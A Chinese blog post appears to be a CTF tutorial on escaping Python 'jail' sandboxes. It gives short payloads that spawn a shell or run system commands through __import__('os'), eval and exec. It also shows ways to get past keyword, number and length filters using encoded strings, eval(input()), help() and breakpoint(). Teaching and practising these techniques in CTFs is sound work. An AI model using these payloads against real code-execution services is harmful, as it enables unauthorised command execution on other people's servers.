MICS:PythonJail沙箱逃逸(持续更新中)

已于 2024-10-09 19:39:58 修改
阅读量1.1k 收藏 22
点赞数 24
分类专栏: CTF # MISC 文章标签: 安全
于 2024-09-25 22:55:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55038440/article/details/142406182
版权
CTF 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
MISC
5 篇文章 0 订阅
订阅专栏

        沙箱是一种防护机制,是用来运行不受信任的代码,通常是用户上传的代码,但这些代码可能是恶意代码,而沙箱就是防止恶意代码运行的机制。所谓沙箱逃逸,就是利用相关操作绕过沙箱防护,从而获得目标主机的文件信息内容等。

        某些沙箱上传代码的入口只能通过ncat或nc访问,ncat命令可以去下载,也可以通过下载Nmap自带。

        nc命令Windows下载地址:netcat 1.11 for Win32/Win64

        下载完成后,将nc.ext放到 C:\Windows\System32下便可以使用。

格式:

ncat ip地址/DNS 端口号

 例:

ncat 127.0.0.1 55375

1、系统命令执行

模块引入

        Python常见的执行系统命令的模块库有os、subprocess等,但这些模块需要引入才可以使用。以下是一些引入的方式:

#动态引入,system函数用以执行系统命令(sh是获取shell)
__import__('os').system('sh')
__import__('os').popen('whoami').read()
#文件读取引入,因为import的原理就是执行一遍导入的库
with open("d:\\anaconda\\lib\\os.py",'r') as f: exec(f.read());system('ls')

        第一种方法,直接动态引入。        

        第二种方法,需要获取模块的py文件路径,其可以通过help()函数获取。,输入要获取的模块名称,就可以在控制台查看到路径。

exec 和 eval 函数

exec可以执行多个Python 语句,而exal可以执行单个python语句或单个表达式。

eval('__import__("os").system("dir")')

exec('__import__("os").system("dir")')

 通过以上代码,可以执行系统代码,但有时候常常会被禁止。

2、字符匹配绕过

        对于字符串匹配绕过的处理方法有很多种,如chr函数、8进制绕过、拼接、16进制绕过、逆序等等。注意:chr函数返回值直接是字符串,不需要单引号。

import base64
print(chr(97))#输出a
# 将数字转换成ASCII字符
print("X19idWlsdGluc19f".decode('base64'))
# 3.x移除了
print('\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f')
# 16进制绕过
print(u'\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f')
# unicode字符绕过
print('__buil'+'tins__')
# 拼接
print('__builtins__'[::-1])
# 逆序
print('\137\137\142\165\151\154\164\151\156\163\137\137')
# 八进制

3、数字匹配绕过

        有时候数字被过滤禁止使用,可以通过ord()函数通过ASCII码转换成数字进行输出,达到想要的结果,同时也可以通过int(True/False)函数来获得0和1,还可以用len()函数通过获得字符串的长度来获得数字。

例:

print(ord('a'))
print(len('sssss'))
print(int(True)+int(True))

4、长度限制绕过

        对于Jail进行长度限制,应对的方法有eval(input())help()函数,breakpoint()函数等

eval(input()) 

        因为过滤的是源代码内部的input(),所以我们可以重开一个input(),这样就能绕过所以过滤规则。

案例:直接通过eval(input())获得shell。 

help()

        使用help函数需要输出的内容输出不完全,如果nc命令输出的内容是完全的则这个命令无法对长度进行绕过。类似于以下这种没有输出全部内容,可以通过!+ 命令执行Linux命令。

例如:通过以下输入方式输入。

breakpoint()

        pdb 模块定义了一个交互式源代码调试器,用于 Python 程序。它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。它还支持事后调试,可以在程序控制下调用。

        在输入 breakpoint() 后可以代开 Pdb 代码调试器,在其中就可以执行任意 python 代码

 

参考资料:

python沙箱逃逸总结_def check(code): for b in blacklist: if b in code:-CSDN博客

CTF Pyjail 沙箱逃逸绕过合集 - 先知社区 (aliyun.com)

Jail 【Python沙箱逃逸问题合集】 - Kicky_Mu - 博客园 (cnblogs.com)

Python Jail 沙盒逃逸 合集_pyjail-CSDN博客

Python—执行系统命令的四种方法(os.system、os.popen、commands、subprocess) - 刘_love_田 - 博客园 (cnblogs.com)

时之彼岸Φ
关注
专栏目录
python沙箱逃逸小结
Assassin
11-11 8659
之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下 首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性1.内联函数python的内敛函数真是强大,可以调用一切函数做自己想做的事情 我们输入dir('builtins')发现如下 我们在python的object类集成了很多的基础函数,我们想要调用的时
CTF MISC在我眼里各种奇奇怪怪的题学习思路总结(持续更新
超大青花鱼的博客
09-18 1008
这一篇主要记录我遇到的我以前没见过也没想过的题,总之奇奇怪怪的知识又增加了。
Python Jail 沙盒逃逸 合集
Jay17的博客
08-22 5200
Python Jail 沙盒逃逸 合集
Python沙箱逃逸
qq_36511916的博客
12-29 557
案例1 def make_secure(): UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'e...
Python沙箱逃逸终极指南:安全漏洞分析和解决方案一网打尽
Rocky006的博客
01-16 1872
Python 是一种强大而灵活的编程语言,但在某些情况下,可能需要运行不受信任的代码,同时又希望限制它的行为,以防止对系统的不良影响。这时,Python 沙箱就成为一种有用的工具,它可以帮助你在安全的环境运行不受信任的代码。本文将探讨 Python 沙箱的概念、常见的沙箱技术以及如何避免沙箱逃逸
python沙箱逃逸总结
weixin_44576725的博客
04-14 4066
python沙箱逃逸总结 让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。 前言 Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。 顺便安利一本书:《流畅的 Python》。这本书有很多高阶知识点,很全面而且讲的很清楚,如果你看过,相
python安全学习笔记-沙箱逃逸
人饭子的博客
11-01 489
沙箱逃逸 免责声明 本文档仅供学习和研究使用,请勿使用文的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 相关文章 初探Python沙箱逃逸 IS-pwn-escape-python沙箱逃逸 Python 沙盒 Python 沙箱逃逸的经验总结 什么是沙箱逃逸 沙箱逃逸,就是在给我们的一个代码执行环境下,脱离种种过滤和限制,最终拿到 shell。 python如何执行...
MICS:结合复制和擦除编码的混合链式存储
03-28
论文的研究成果不仅证明了MICS在读写性能和稳定性上的优势,也展示了其在云存储系统实现高可靠性、低空间成本和高效读写性能的可能性。通过MICS的实践,研究者们展示了如何通过创新的存储策略来优化现有的云存储...
MiCS:大数据互信息计算与特征分组的并行系统
这种方案通过智能地划分和分布数据,确保工作负载在集群的均衡分布,从而提高MiCS的效率和Spark集群资源的利用率。这不仅降低了计算延迟,还有助于避免由于数据不平衡导致的性能瓶颈。 在特征分组的应用,互...
MICS-WASH-BOD:柳叶刀委员会BOD更新了不良水,卫生设施和儿童卫生后果的归因风险
02-09
柳叶刀委员会(The Lancet Commission on BOD)对此进行了深入研究,并发布了最新的更新报告——MICS-WASH-BOD。这项研究揭示了不良水环境、卫生设施不足以及不卫生条件对儿童健康造成的严重影响,为公共卫生政策...
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
MICS-4514_CO_and_NOx_Sensor_Breakout:MiCS-4514 CO和NOx气体传感器的分线板
05-12
MICS-4514_CO_and_NOx_Sensor_Breakout MiCS-4514 CO和NOx气体传感器的分线板。 计算CO和NOx值 几年来我一直无法从事这个项目,目前,我认为我无法在可预见的将来继续该项目(即认为这是一个死项目)。 但是,非常...
MICS:副本和纠删码混合存储系统
字节跳动 内推找我
04-11 6621
摘要云存储系统的三个指标: 高可靠性,低存储开销,高读写性能。这三个指标是没有办法同时满足的,很多时候需要进行tradeoff。 副本系统和纠删码是两种在存储系统广泛使用的策略,它们在保证高可靠性的前提下,选择了不同极端的tradeoff。 副本存储开销大,但性能较好;纠删码存储开销低,但性能较差。本文提出了MICS系统,它将一个对象以两种形式存储,一种采用副本,一种采用分片纠删码,不仅如此,还设
沙箱逃逸-通过题解了解沙箱逃逸
qq_56815564的博客
05-31 2027
这个系列的最后一题,给了个窗口,先按照提示输入对应的字符看看:G是表明了黑名单,这里不能执行import,不能定义函数,不能使用lambda表达式,可以的就是能执行多行代码。这个时候想到类的定义把带有@的函数放到某个函数的定义处,相当于执行了一次@后的函数后面这个是一个类定义,这里的pass的主要作用就是占据位置,让代码整体完整,定义一个空类会报错尝试执行:进入main函数主体,这个时候就可以通过使用一句话RCE来获取shell了这个系列就结束了,个人觉得还是挺面向新手的,一步一步来吧。
沙箱逃逸_
最新发布
BKN711的博客
04-16 303
使用vm模块,vm是nodejs 内置的模块,是nodejs提供的隔离环境。
python沙盒逃逸
Lethe's Blog
08-13 2321
0x01 简单介绍 python沙盒逃逸就是通过绕过种种过滤和限制,拿到本不应获取的一些“危险函数",或者绕过Python终端达到命令执行的效果。 0x02 常用备忘录 (1)func_globals 用法:function.func_globals 作用:返回包含函数全局变量的字典的引用——定义函数的模块的全局命名空间。 >>> def test():pass ... &gt...
python沙箱逃逸
夏日 の blog
02-06 1578
说明:本篇文章适合这方面的小白的入门,结合我的另一篇文章https://blog.csdn.net/zss192/article/details/104199520更容易理解 一些常见的寻找特殊模块的方式 __class__:获得当前对象的类 __bases__:列出其基类 __mro__ :列出解析方法的调用顺序,类似于bases __subclasses__():返回子类列表 __dict...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值